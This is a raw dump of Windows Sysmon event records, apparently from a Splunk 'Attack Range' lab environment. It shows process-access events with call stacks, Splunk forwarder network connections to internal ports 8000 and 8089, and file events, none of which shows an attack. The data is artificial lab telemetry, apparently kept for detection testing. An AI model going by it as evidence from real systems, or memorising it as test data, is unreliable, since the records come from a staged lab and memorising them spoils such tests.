10:50:47.271{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216640Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:47.271{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216639Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:47.271{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216638Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:47.271{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216637Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:47.271{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216636Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:47.271{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216635Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:47.271{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216634Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:47.271{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216633Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:47.271{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216632Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:47.271{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-1187-6216-5904-000000003902}1216C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216631Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:47.271{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1187-6216-5904-000000003902}1216C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216630Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:47.272{4F8D34B0-1187-6216-5904-000000003902}1216C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000216629Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:44.603{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51340-false10.0.1.12-8000- 23542300x8000000000000000287736Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:48.636{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E7BAAB358FA7A0348BA7678DA3DAEF01,SHA256=90186263A9F0002873EDAF969F972CC56B66D9C65986D759E513A46374BB5C4A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216660Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:48.585{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=247B4756052487E47BDED8DB49F421AB,SHA256=12FDE87A4410995CF9B70D30C63075365F96903ECC0F83E0BAE109C40D0FC5A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216659Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:48.272{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=552D1E6C9C5D9AE91A7BF1F00A3CEF0F,SHA256=289C39276BAFC66AEBD30C65A9996F968EDF05062966B60BB8738FB1238FE1A7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000216658Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:45.416{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51341-false10.0.1.12-8089- 23542300x8000000000000000287737Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:49.668{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=684406A6EF5DCA9C7C6EAA38AAE033C3,SHA256=CC27FA9337504E22DAC54C5EEC8B845086CEE22C1CC746FF1703E2E9B1660130,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000216675Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:49.929{4F8D34B0-1189-6216-5B04-000000003902}33922120C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000216674Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:49.616{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F011195FC94291EA7931A34C9BA82D2D,SHA256=3FA4944C053E1B33FD3682B78D32F49AD6C0115D3CD0D1F89D1CE8EBA570080D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000216673Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:49.397{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1189-6216-5B04-000000003902}3392C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216672Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:49.397{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216671Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:49.397{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216670Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:49.397{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216669Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:49.397{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216668Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:49.397{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216667Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:49.397{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216666Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:49.397{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216665Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:49.397{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216664Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 